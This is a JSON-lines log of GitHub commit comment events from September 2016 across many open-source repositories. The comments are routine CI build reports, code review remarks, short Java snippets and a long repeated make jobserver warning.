{"id":"4574058543","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19054153,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T13:32:24Z","updated_at":"2016-09-16T13:32:24Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-16T13:32:24Z"}
{"id":"4574061370","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19054155,"position":null,"line":null,"path":null,"commit_id":"da61367f8222cc9d95ee8b093b555e4f0844a53f","created_at":"2016-09-16T13:32:54Z","updated_at":"2016-09-16T13:32:54Z","body":"I'll try to find out which icons are in fact the same in both themes. Then it will probably be better to just use one package for regular and dark theme with symlinks..."}},"created_at":"2016-09-16T13:32:54Z"}
{"id":"4574062173","type":"CommitCommentEvent","actor":{"login":"kd0aij"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19054158,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-16T13:33:06Z","updated_at":"2016-09-16T13:33:06Z","body":"auto-completion doesn't work at all for make targets\r\nAlso, with the -j switch it prints this many times now:\r\n```\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\nmake[4]: warning: jobserver unavailable: using -j1.  Add '+' to parent make rule.\r\n```\r\n"}},"created_at":"2016-09-16T13:33:06Z"}
{"id":"4574065149","type":"CommitCommentEvent","actor":{"login":"jpstroop"},"repo":{"name":"IIIF/iiif.io"},"payload":{"comment":{"id":19054163,"position":52,"line":52,"path":"source/api/annex/notes/design_patterns.md","commit_id":"fa809782a558c6e19004420fa6dd30069774fa4a","created_at":"2016-09-16T13:33:41Z","updated_at":"2016-09-16T13:33:41Z","body":"Shared patterns and idioms across the specs makes them collectively easier to implement and build tools around, but no IIIF specification assumes implementation of another IIIF specification."}},"created_at":"2016-09-16T13:33:41Z"}
{"id":"4574067291","type":"CommitCommentEvent","actor":{"login":"matklad"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":19054167,"position":25,"line":59,"path":"src/main/kotlin/org/rust/lang/core/symbols/RustPath.kt","commit_id":"0095b8974f0a74ebcc7a675fb9fbdae0cdbe6e10","created_at":"2016-09-16T13:34:07Z","updated_at":"2016-09-16T13:34:07Z","body":"Aha, so the problem is not with companions implementing interfaces, but with pollution the class namespace with unrelated methods! \r\n\r\nI think that ideally we should put a bunch of extensions onto the `DataInput` and `Output` then, like\r\n\r\n```\r\nfun DataInput.readRustUnresolvedType(): RustUnresolvedType = TODO()\r\nfun<T> DataInput.nullable(f: DataInput.() -> T): T? = if (readBoolean()) null else f()\r\n```"}},"created_at":"2016-09-16T13:34:07Z"}
{"id":"4574068974","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19054175,"position":null,"line":null,"path":null,"commit_id":"109eaaaa3adf01c40b00f621d2618be20090dbde","created_at":"2016-09-16T13:34:24Z","updated_at":"2016-09-16T13:34:24Z","body":"TaskCluster: @NinadBhat does not have permission to trigger tasks."}},"created_at":"2016-09-16T13:34:24Z"}
{"id":"4574069830","type":"CommitCommentEvent","actor":{"login":"jpstroop"},"repo":{"name":"IIIF/iiif.io"},"payload":{"comment":{"id":19054178,"position":76,"line":76,"path":"source/api/annex/notes/design_patterns.md","commit_id":"fa809782a558c6e19004420fa6dd30069774fa4a","created_at":"2016-09-16T13:34:34Z","updated_at":"2016-09-16T13:34:34Z","body":"See comment under Resource Orientation. Maybe these can merge?"}},"created_at":"2016-09-16T13:34:34Z"}
{"id":"4574070009","type":"CommitCommentEvent","actor":{"login":"markstos"},"repo":{"name":"leejo/CGI.pm"},"payload":{"comment":{"id":19054179,"position":null,"line":null,"path":null,"commit_id":"02b472d681a562dbf7e0950bd7d093866336776a","created_at":"2016-09-16T13:34:36Z","updated_at":"2016-09-16T13:34:36Z","body":"Thanks!"}},"created_at":"2016-09-16T13:34:36Z"}
{"id":"4574071496","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"IriGri/JAVA-edu"},"payload":{"comment":{"id":19054184,"position":25,"line":15,"path":"sandbox/src/main/java/edu/stqa/irigri/sandbox/Point.java","commit_id":"99adcc5ac1877c926aac15438ee05daf34ce71e7","created_at":"2016-09-16T13:34:54Z","updated_at":"2016-09-16T13:34:54Z","body":" public double distance(Point p2){\r\n      return Math.sqrt( Math.pow(p2.x-this.x, 2) + Math.pow(p2.y-this.y, 2) );\r\n  } // исправим так"}},"created_at":"2016-09-16T13:34:54Z"}
{"id":"4574072033","type":"CommitCommentEvent","actor":{"login":"Shezm"},"repo":{"name":"Shezm/Shezm.github.io"},"payload":{"comment":{"id":19054186,"position":null,"line":null,"path":null,"commit_id":"d61f85fa4979c5d480421856b1bdc9656646c0e6","created_at":"2016-09-16T13:35:00Z","updated_at":"2016-09-16T13:35:00Z","body":"3434"}},"created_at":"2016-09-16T13:35:00Z"}
{"id":"4574072617","type":"CommitCommentEvent","actor":{"login":"claradaia"},"repo":{"name":"whoshuu/cpr"},"payload":{"comment":{"id":19054188,"position":null,"line":null,"path":null,"commit_id":"822bd5ea765f37187cb75ac3435c769c5c711abf","created_at":"2016-09-16T13:35:09Z","updated_at":"2016-09-16T13:35:09Z","body":"Any chance of updating curl again soon? They've just commited a fix I need."}},"created_at":"2016-09-16T13:35:09Z"}
{"id":"4574073022","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"IriGri/JAVA-edu"},"payload":{"comment":{"id":19054190,"position":8,"line":8,"path":"sandbox/src/main/java/edu/stqa/irigri/sandbox/Distance.java","commit_id":"99adcc5ac1877c926aac15438ee05daf34ce71e7","created_at":"2016-09-16T13:35:14Z","updated_at":"2016-09-16T13:35:14Z","body":"System.out.println(\"Дистанция между точками = \" + p1.distance(p2)); // вызвать надо так"}},"created_at":"2016-09-16T13:35:14Z"}
{"id":"4574074776","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19054196,"position":null,"line":null,"path":null,"commit_id":"b3726500b30e018955997c0919a9ac8ea7126fef","created_at":"2016-09-16T13:35:31Z","updated_at":"2016-09-16T13:35:31Z","body":"Good stuff"}},"created_at":"2016-09-16T13:35:31Z"}
{"id":"4574075453","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054198,"position":236,"line":5056,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:35:40Z","updated_at":"2016-09-16T13:35:40Z","body":"_implements_ => _which implements_"}},"created_at":"2016-09-16T13:35:40Z"}
{"id":"4574075794","type":"CommitCommentEvent","actor":{"login":"alexjfisher"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":19054200,"position":null,"line":null,"path":null,"commit_id":"6d4534a1d2738e16bb93800ed547a937336b6367","created_at":"2016-09-16T13:35:44Z","updated_at":"2016-09-16T13:35:44Z","body":"@ct16k Sorry about that.  There's a full discussion on https://github.com/voxpupuli/puppet-php/pull/238"}},"created_at":"2016-09-16T13:35:44Z"}
{"id":"4574080931","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054213,"position":261,"line":5070,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:36:43Z","updated_at":"2016-09-16T13:36:43Z","body":"I think that the second argument to Construct is an argument list, not an argument -- perhaps it should technically be `[options]`?"}},"created_at":"2016-09-16T13:36:43Z"}
{"id":"4574088438","type":"CommitCommentEvent","actor":{"login":"ChristianBeer"},"repo":{"name":"drshawnkwang/boinc"},"payload":{"comment":{"id":19054230,"position":7,"line":768,"path":"drupal/sites/default/boinc/modules/boincwork/includes/boincwork.helpers.inc","commit_id":"53ac33708dd6aefa54814e25ebf6477d4af120a5","created_at":"2016-09-16T13:38:11Z","updated_at":"2016-09-16T13:38:11Z","body":"This change is the actual necessary one that will also fix the project preferences. I missed a second call to `boincwork_load_prefs` in `boincwork_generalprefs_form_submit` that doesn't use the attribute but where we need to put in the transform old to new. I'm going to commit to my original PR those changes."}},"created_at":"2016-09-16T13:38:11Z"}
{"id":"4574090407","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054236,"position":null,"line":null,"path":null,"commit_id":"4beb2150f4952d971194c5051d096350fbbb04c5","created_at":"2016-09-16T13:38:32Z","updated_at":"2016-09-16T13:38:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1024](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13430&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:09:15"}},"created_at":"2016-09-16T13:38:32Z"}
{"id":"4574094816","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19054245,"position":null,"line":null,"path":null,"commit_id":"6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e","created_at":"2016-09-16T13:39:23Z","updated_at":"2016-09-16T13:39:23Z","body":"5039_stratified_tank_speedup (nmerket) - x86_64-MacOS-10.9-clang: OK (2329 of 2331 tests passed, 7 test warnings)\n\n * 4 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 7 tests had: ESO small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6e7b2b73ccb2f11723abf94b2ee3d2f74b84bd7e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T13:39:23Z"}
{"id":"4574095951","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054246,"position":null,"line":null,"path":null,"commit_id":"feb82bcc8257ac6e175bf12e8ea5c50f1008274e","created_at":"2016-09-16T13:39:35Z","updated_at":"2016-09-16T13:39:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1025](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13436&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:39:35Z"}
{"id":"4574100908","type":"CommitCommentEvent","actor":{"login":"lvinagre"},"repo":{"name":"lvinagre/Bible-Skel-Checker"},"payload":{"comment":{"id":19054263,"position":null,"line":null,"path":null,"commit_id":"4e1133796e7cea8a15aba64469ab849fff4ecc56","created_at":"2016-09-16T13:40:29Z","updated_at":"2016-09-16T13:40:29Z","body":"ZIP containing the app."}},"created_at":"2016-09-16T13:40:29Z"}
{"id":"4574101622","type":"CommitCommentEvent","actor":{"login":"fbiville"},"repo":{"name":"fpavageau/neo4j-sproc-compiler"},"payload":{"comment":{"id":19054268,"position":null,"line":null,"path":null,"commit_id":"7d9b20778bfd1a1ed6bb3afea560e28141c554c1","created_at":"2016-09-16T13:40:37Z","updated_at":"2016-09-16T13:40:37Z","body":"Ah, good catch.\r\n\r\nIt's a bit weird, though, that the Shade plugin does not take optional into account.\r\n\r\nI think optional: true should remain, even if it has little practical effect. It makes sense for annotation processors to not be transitively fetched (that's the role of optional afaik).\r\n\r\nSo the fix would consist in: optional+ provided.\r\n\r\nDoes it make sense?\r\n"}},"created_at":"2016-09-16T13:40:37Z"}
{"id":"4574105311","type":"CommitCommentEvent","actor":{"login":"joeberkovitz"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19054279,"position":262,"line":5071,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T13:41:21Z","updated_at":"2016-09-16T13:41:21Z","body":"I think we are missing the structured clone of options here, as per @domenic's earlier comment."}},"created_at":"2016-09-16T13:41:21Z"}
{"id":"4574105389","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"dumamoiseev/newbie_coding"},"payload":{"comment":{"id":19054280,"position":7,"line":9,"path":"sandbox/src/main/java/Point.java","commit_id":"3ed5964bcf6b82579420455908e4aa6a5e50d036","created_at":"2016-09-16T13:41:22Z","updated_at":"2016-09-16T13:41:22Z","body":"    public double distance(Point p2) {\r\n         return Math.sqrt((p2.x - this.x) * (p2.x - this.x) + (p2.y - this.y) * (p2.y - this.y));\r\n }"}},"created_at":"2016-09-16T13:41:22Z"}
{"id":"4574107698","type":"CommitCommentEvent","actor":{"login":"mark0263"},"repo":{"name":"glFusion/glfusion"},"payload":{"comment":{"id":19054291,"position":null,"line":null,"path":null,"commit_id":"e6b4c9f6ccb809713aed607a0901ab14d6348314","created_at":"2016-09-16T13:41:49Z","updated_at":"2016-09-16T13:41:49Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;W5uOxYS2&#x2F;38-polls-voter-data-could-be-overwritten\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Polls - voter data could be overwritten</a>"}},"created_at":"2016-09-16T13:41:49Z"}
{"id":"4574111276","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054300,"position":null,"line":null,"path":null,"commit_id":"e62d81544e039f42d2aa972c24d784702348565b","created_at":"2016-09-16T13:42:26Z","updated_at":"2016-09-16T13:42:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1026](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13437&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:42:26Z"}
{"id":"4574114637","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19054310,"position":null,"line":null,"path":null,"commit_id":"eb3360b02ab82d20bc3c3f38f543b0d742598346","created_at":"2016-09-16T13:43:03Z","updated_at":"2016-09-16T13:43:03Z","body":"https://github.com/facebook/react-native/pull/9944"}},"created_at":"2016-09-16T13:43:03Z"}
{"id":"4574119434","type":"CommitCommentEvent","actor":{"login":"kuharan"},"repo":{"name":"kuharan/imad-2016-app"},"payload":{"comment":{"id":19054321,"position":7,"line":7,"path":"index.html","commit_id":"94f80fa6ff6f5e33bc44374e875d58ef0606b6b5","created_at":"2016-09-16T13:43:59Z","updated_at":"2016-09-16T13:43:59Z","body":"?"}},"created_at":"2016-09-16T13:43:59Z"}
{"id":"4574120644","type":"CommitCommentEvent","actor":{"login":"jozef8484"},"repo":{"name":"PatornP/CEN5035Project"},"payload":{"comment":{"id":19054324,"position":null,"line":null,"path":null,"commit_id":"6b9a8733e197be0ceb698ed86bc65f9ca2c0b4bb","created_at":"2016-09-16T13:44:14Z","updated_at":"2016-09-16T13:44:14Z","body":"//first commit"}},"created_at":"2016-09-16T13:44:14Z"}
{"id":"4574121171","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19054328,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T13:44:20Z","updated_at":"2016-09-16T13:44:20Z","body":"Great : i already do each time in my config :). By default is a really good idea : maybe just error,warning ?"}},"created_at":"2016-09-16T13:44:20Z"}
{"id":"4574121554","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19054330,"position":null,"line":null,"path":null,"commit_id":"020694e33e6eea72b0b67e595e5f6187adff998e","created_at":"2016-09-16T13:44:23Z","updated_at":"2016-09-16T13:44:23Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1027](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13439&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-16T13:44:23Z"}
{"id":"4574123361","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19054331,"position":9,"line":12,"path":"crytographic_primitives.md","commit_id":"ed8629b5759fed4b245e9998e10be280a5974e5c","created_at":"2016-09-16T13:44:43Z","updated_at":"2016-09-16T13:44:43Z","body":"Is there supposed to be an i in front of SHA-256? "}},"created_at":"2016-09-16T13:44:43Z"}
{"id":"4574125470","type":"CommitCommentEvent","actor":{"login":"toopy"},"repo":{"name":"novafloss/ansible-setup"},"payload":{"comment":{"id":19054335,"position":31,"line":98,"path":"setup.sh","commit_id":"213426f167f71532bc8a78de703894fc72bb5756","created_at":"2016-09-16T13:45:09Z","updated_at":"2016-09-16T13:45:09Z","body":"Dsl c'est une erreur de ma part. Je n'ai pas vue ce commentaire. Il n'y a aucune, juste un copier/coller de noob dsl."}},"created_at":"2016-09-16T13:45:09Z"}
{"id":"4574130576","type":"CommitCommentEvent","actor":{"login":"ak6rkxqhy3fh"},"repo":{"name":"ak6rkxqhy3fh/WebApp2"},"payload":{"comment":{"id":19054351,"position":4,"line":8,"path":"src/WebApp2/Views/Home/About.cshtml","commit_id":"6a5dce8db5553d3dc32d19ee7c1825bec5a3661a","created_at":"2016-09-16T13:46:04Z","updated_at":"2016-09-16T13:46:04Z","body":"Да, я посмотрел, все верно"}},"created_at":"2016-09-16T13:46:04Z"}
